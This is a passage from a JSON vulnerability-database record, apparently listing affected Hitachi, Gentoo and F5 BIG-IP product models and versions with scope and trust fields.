            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "04-00-02"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "04-00-01"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "04-00"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-12"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-11"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-10"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-09"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-08"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-07"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-06"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-04"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-03"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00-01"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-00"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-07"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-06"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-05"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-04"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-03"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-02"
          },
          {
            "_id": null,
            "model": "it operations director",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-50-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-02"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-01-02"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-01-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "03-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-53-02"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-53-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-53"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-51-01"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-51"
          },
          {
            "_id": null,
            "model": "it operations analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "02-01"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-03"
          },
          {
            "_id": null,
            "model": "cosminexus component container (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-03"
          },
          {
            "_id": null,
            "model": "cosminexus component container (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-03"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50-01"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "cosminexus component container (windows(x8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-10"
          },
          {
            "_id": null,
            "model": "cosminexus component container (windows(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-10"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-10"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-08"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-08"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "cosminexus component container hp-ux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00-01"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip wom hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip wom hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip wom hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip wom hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip wom hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip wom",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.00"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip psm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip psm hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip pem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip pem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip pem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip pem",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip pem hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip ltm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.00"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip gtm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.00"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.00"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0.00"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.40"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.00"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip asm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip asm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip asm hf3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "big-ip asm hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip asm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "big-ip asm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip asm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.1"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.4"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5.0"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.1"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.4.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip apm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.3.0"
          },
          {
            "_id": null,
            "model": "big-ip apm hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "big-ip apm hf3",
